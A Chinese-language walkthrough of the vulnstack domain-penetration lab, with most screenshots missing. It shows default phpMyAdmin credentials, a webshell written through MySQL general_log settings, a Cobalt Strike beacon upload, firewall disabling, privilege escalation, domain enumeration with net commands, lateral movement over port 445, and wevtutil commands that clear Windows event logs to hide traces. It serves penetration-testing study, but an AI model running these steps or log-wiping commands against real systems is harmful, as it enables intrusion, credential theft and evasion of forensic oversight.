一、环境搭建
1.下载
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
2.网络配置
一共4台虚拟机,1台为自己准备的kali攻击机,剩下3台为下载的靶机(win7为web服务器,winserver08为域控,win2K3为域内主机)
网络拓扑:
VmWare配置:
新建网卡VMnet2为仅主机模式,设置子网IP为192.168.52.0
kali和win7采用NAT模式(模拟外网),winserver08、win2K3和win7采用仅主机模式(选择VMnet2,其中win7为双网卡)
配置成功后各主机截图:
kali:
win7:
winserver08:
win2K3:
3.开启集成环境
在win7web服务器中开启phpStudy环境,位置在C盘(若开启失败,重启虚拟机)
二、漏洞利用
1.漏洞搜索
kali与win7web服务器同属110网段,使用namp进行扫描
(注:此处的192.168.110.130与前后文的192.168.110.134都是win7web服务器,因为是前后两次的操作,所以有变化,将130看成134即可,请知悉)
访问80端口:
泄露了绝对路径
进行目录扫描:
访问phpmyadmin:
使用默认密码(root/root)登录成功:
2.上传shell(开启全局日志getshell)
查看日志是否开启:
show variables like '%general%';
开启日志并设置日志存储路径:
set global general_log=on; # 开启日志
set global general_log_file='C:/phpStudy/WWW/3.php';# 设置日志位置
再次查询:
写入SHELL:
上传成功:
使用蚁剑连接:
3.CS上线
kali开启服务端:
客户端:
设置web监听器:
生成攻击exe,监听器选择web:
将生成的exe通过蚁剑上传到win7web服务器上,并且通过虚拟终端执行该exe:
在CS中看到win7已上线:
设置回连时间为0(太长不利于操作,太短容易被发现,因为是靶机所以设置为0):
打开beacon:
关闭防火墙,方便后续操作:
提权:
提权成功,变成system(也设置回连时间为0):
三、内网渗透
1.信息搜集
1-1:
shell ipconfig
1-2:
shell net view /domain
1-3(引用):
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain # 查看域中某工作组
net group "domain admins" /domain # 查看域管理员的名字
net group "domain computers" /domain # 查看域中的其他主机名
net group "doamin controllers" /domain # 查看域控制器(可能有多台)
1-4:
端口扫描
由前面ipconfig知道内网网段为52
扫描结果(143为win7web服务器,138为winserver08域控,141为win2K3域内主机,都开放了445端口)
1-5
主机密码搜集
得到账户密码
2.横向移动
前面发现都开启了445端口,设置监听器
尝试登录域控
第一次成功了,但是第二次尝试不知道为什么失败了,下面是失败的截图
进入域控失败
同样的操作,进入域内主机成功
3.维权
若进入域控成功,制作黄金票据进行持久性控制
(注:后续还有未尽事项,请参考别的文章)
四、痕迹清除
攻击会留下痕迹,容易被溯源,渗透完成后应该删除日志文件
事件查看器打开方式
win+R,输入eventvwr
清除指令(引用)
shell wevtutil cl security //清理安全日志
shell wevtutil cl system //清理系统日志
shell wevtutil cl application //清理应用程序日志
shell wevtutil cl "windows powershell" //清除power shell日志
shell wevtutil cl Setup //清除(cl)事件日志中的 "Setup" 事件。